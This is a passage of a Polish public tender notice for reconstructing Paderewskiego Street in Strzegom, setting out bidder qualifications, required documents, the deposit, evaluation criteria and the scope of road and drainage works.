z projektów budowlanych i wykonawczego, zgłoszeń robót do Wojewody Dolnośląskiego, opinii Wojewódzkiego Urzędu Ochrony Zabytków, uzgodnieniach branżowych, niniejszej specyfikacji istotnych warunków zamówienia, specyfikacji technicznych wykonania i odbioru robót budowlanych, podatek VAT oraz obejmować wszelkie koszty, jakie poniesie Wykonawca związane z wykonaniem przedmiotu  zamówienia z tytułu należnej oraz zgodnej z obowiązującymi przepisami realizacji przedmiotu zamówienia, m.in. (ale się do nich nie ograniczać): koszty wszystkich robót przygotowawczych i zabezpieczających, koszty utrzymania placu budowy, koszty wywozu gruzu na składowisko odpadów komunalnych oraz koszty utylizacji odpadów, koszty uzyskania uzgodnień branżowych, protokołów badań i sprawdzeń, wszelkie opłaty 
i odszkodowania za szkody oraz straty wynikłe w związku   z wykonywanymi robotami. 

2.3.21. Cena ofertowa jest to wynagrodzenie  ryczałtowe za wykonanie całego przedmiotu zamówienia w określonym terminie wraz  z podatkiem VAT.

2.3.22. Jeżeli gdziekolwiek w dokumentacji budowlanej użyto nazwy marek (firm), wyrobów budowlanych czy technologii, w myśl art. 29 ust.3 ustawy Prawo zamówień publicznych, należy to traktować jako informację na temat oczekiwanego standardu i poziomu jakości, a nie ściśle jako określenie wyrobu koniecznego do użycia. Możliwe jest zastosowanie innych równoważnych wyrobów budowlanych i technologii, których równoważność opisano w Specyfikacjach Technicznych lub dokumentacji projektowej.
2.3.23. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany będzie  posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
w tym za szkody i następstwa nieszczęśliwych wypadków powstałych w związku
z prowadzonymi pracami, na kwotę nie niższą niż 4 000  000 zł dla Części I i 400 000 zł dla Części II. 
Ubezpieczenie OC winno obejmować również szkody wyrządzone przez wszystkich Podwykonawców lub dalszych Podwykonawców. Wykonawca zobowiązany będzie przedłożyć Zamawiającemu,  w terminie 14 dni od zawarcia umowy kopię polisy ubezpieczeniowej.

2.3.24. Zatrudnienie na umowę o pracę
Na podstawie art. 29 ust. 3a ustawy Pzp, Zamawiający wymaga zatrudnienia na podstawie umowy 
o pracę przez wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności 
w trakcie realizacji zamówienia:
a) roboty przygotowawcze i ziemne,
b) roboty nawierzchniowe i wykończeniowych,
c) roboty związane z wprowadzeniem urządzeń bezpieczeństwa ruchu,
d) roboty kanalizacyjne,
e) roboty elektryczne.

2.3.25. W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 2.3.24. czynności. Zamawiający uprawniony jest w szczególności do: 
a)	żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów 
i dokonywania ich oceny,
b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,
c)	przeprowadzania kontroli na miejscu wykonywania świadczenia.

2.3.26. W trakcie realizacji zamówienia na każde wezwanie zamawiającego w wyznaczonym w tym wezwaniu terminie wykonawca przedłoży zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących wskazane w punkcie 2.3.24. czynności w trakcie realizacji zamówienia:
	oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy 
o pracę osób wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpisem osoby uprawnionej do złożenia oświadczenia 
w imieniu wykonawcy lub podwykonawcy;
	poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych 
(tj. w szczególności bez imion, nazwisk, adresów, nr PESEL pracowników). Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania;
	zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;
	poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie 
z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych.

2.3.27. Z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 2.3.24. czynności zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej w wysokości określonej w istotnych postanowieniach  umowy w sprawie zamówienia publicznego. Niezłożenie przez wykonawcę w wyznaczonym przez zamawiającego terminie żądanych przez zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 2.3.24. czynności. 
2.3.28. W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez wykonawcę lub podwykonawcę, zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.
<br /><br /><b>II.5) Główny kod CPV: </b>45110000-1<br /><b> Dodatkowe kody CPV:</b>45233000-9,
                45233140-2,
                45233290-8,
                45231400-9,
                45316110-9,
                45231000-5,
                32412100-5,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/10/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>-</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w ww. zakresie.<br />
                Informacje dodatkowe
                -<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że
- posiada środki finansowe lub zdolność kredytową w wysokości co najmniej:
 a) dla CZĘŚCI I:   300 000,00 zł
 b) dla CZĘŚCI II: 300 000,00 zł
<br />
                Informacje dodatkowe
                -<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                CZĘŚĆ I : 
4.2.3.1. dysponuje następującymi osobami:
a) kierownik budowy posiadający uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalności drogowej,

b) kierownik robót posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci elektrycznych i energetycznych.

c) kierownik robót posiadający uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie sieci kanalizacyjnych

d) kierownik robót posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych

4.2.3.2. należycie zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy  to w tym okresie, co najmniej:
a) jedną robotę budowlaną polegającą na budowie, remoncie bądź przebudowie drogi z jezdnią 
o nawierzchni bitumicznej o wartość min. 1 500 000,00 zł brutto,

b) jedną robotę budowlaną polegającą na budowie, przebudowie bądź remoncie oświetlenia ulicznego lub zewnętrznego o wartości min. 30 000,00 zł brutto.

c) jedną robotę budowlaną polegającej na budowie lub przebudowie kanalizacji deszczowej lub/i kanalizacji sanitarnej o wartości min. 350 000,00 zł brutto.

d) Jedną robotę budowlaną polegającej na budowie, przebudowie bądź remoncie nawierzchni  
z kostki kamiennej lub betonowej o wartości min. 200 000,00 zł brutto. 

Powyższe roboty mogą stanowić odrębne zamówienia lub wchodzić w zakres jednego przedsięwzięcia.

CZĘŚĆ II : 
4.2.3.3. dysponuje następującymi osobami:

a) kierownik budowy posiadający uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalności drogowej,

b) kierownik robót posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci elektrycznych i energetycznych.

c) kierownik robót posiadający uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie sieci kanalizacyjnych

d) kierownik robót posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych

4.2.3.4. należycie zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy  to w tym okresie, co najmniej:

a) jedną robotę budowlaną polegającą na budowie, remoncie bądź przebudowie drogi z jezdnią 
o nawierzchni bitumicznej o wartość min. 250 000,00 zł brutto,

b) jedną robotę budowlaną polegającą na budowie, przebudowie bądź remoncie oświetlenia ulicznego lub zewnętrznego o wartości min. 20 000,00 zł brutto.

c) jedną robotę budowlaną polegającej na budowie lub przebudowie kanalizacji deszczowej lub/i kanalizacji sanitarnej o wartości min. 80 000,00 zł brutto.

d) Jedną robotę budowlaną polegającej na budowie, przebudowie bądź remoncie nawierzchni  
z kostki kamiennej lub betonowej o wartości min. 80 000,00 zł brutto. 

Powyższe roboty mogą stanowić odrębne zamówienia lub wchodzić w zakres jednego przedsięwzięcia.

W PRZYPADKU JEŻELI WYKONAWCA SKŁADA OFERTĘ NA WIĘCEJ NIŻ JEDNĄ CZĘŚĆ ZAMÓWIENIA OSOBY PRZEDSTAWIONE W WYKAZIE MOGĄ BYĆ WSKAZANE DO WIĘCEJ NIŻ JEDNEJ CZĘŚĆI .
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 2. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. wykazu prac wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te prace zostały wykonane należycie, w szczególności informacji o tym czy prace zostały wykonane zgodnie z przepisami prawa i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego prace były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty (zgodnie ze wzorem stanowiącym załącznik nr 5 do SIWZ); 2. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zgodnie ze wzorem stanowiącym załącznik nr 6 do SIWZ). 3. informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składnia ofert w postępowaniu o udzielenie zamówienia; <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wraz z ofertą Wykonawca składa zobowiązanie podmiotu trzeciego, o którym mowa w pkt 4.5.1 i 4.5.4 SIWZ - jeżeli wykonawca polega na zasobach lub sytuacji podmiotu trzeciego. 2. Na żądanie Zamawiającego Wykonawca składa dokumenty dotyczące podmiotu trzeciego, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu - jeżeli wykonawca polega na zasobach podmiotu trzeciego.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b><br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />6.1	Wykonawca jest zobowiązany wnieść wadium w wysokości:
CZĘŚĆ I: 60 000,00 zł
CZĘŚĆ II: 9 000,00 zł
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zakres, charakter zmian oraz warunki wprowadzenia zmian określone zostały w SIWZ.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 30/01/2017, godzina: 11:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                tak
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>PRZEBUDOWA UL. PADEREWSKIEGO W STRZEGOMIU<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
2.1. CZĘŚĆ I: PRZEBUDOWA UL. PADEREWSKIEGO W STRZEGOMIU

2.1.1. ZADANIE 1 obejmuje przebudowę ul. Paderewskiego w Strzegomiu od skrzyżowania 
z ul. Legnicką do Rynku - zakres robót w pasie drogowym objęty jest dofinansowaniem 
w ramach programu wieloletniego pod nazwą ,,PROGRAM ROZWOJU GMINNEJ 
I POWIATOWEJ INFRASTRUKTURY DROGOWEJ NA LATA 2016-2019.

Zakres robót obejmuje między innymi wykonanie:
- przesadzenie 5-ciu sztuk drzew na działkę nr 1682 AM-15 obręb śródmieście. Przesadzenie należy dokonać w porozumieniu z pracownikiem Wydziału Gospodarki Komunalnej Ochrony Środowiska i Wsi Urzędu Miejskiego w Strzegomiu. 
- usunięcie 1 sztuki drzewa znajdującego się na przeciwko budynku ul. Paderewskiego 28, wraz 
z karczowaniem, pocięciem dłużyc na 1m kawałki i przekazaniem do Zakładu Usług Komunalnych Sp. z o.o. w Strzegomiu, 
-  robót rozbiórkowych i demontażowych,
-  korytowania, profilowania i zagęszczania podłoża, podbudowy,
- nowej nawierzchni jezdni z kostki granitowej i betonu asfaltowego,
- ścieku przykrawężnikowego z kostki granitowej,
- miejsc postojowych z kostki granitowej, oddzielonych rzędem kostki bazaltowej,
- zjazdów z kostki granitowej,
- ścieżki rowerowej z betonu asfaltowego,
- chodników z kostki granitowej oraz płyt granitowych,
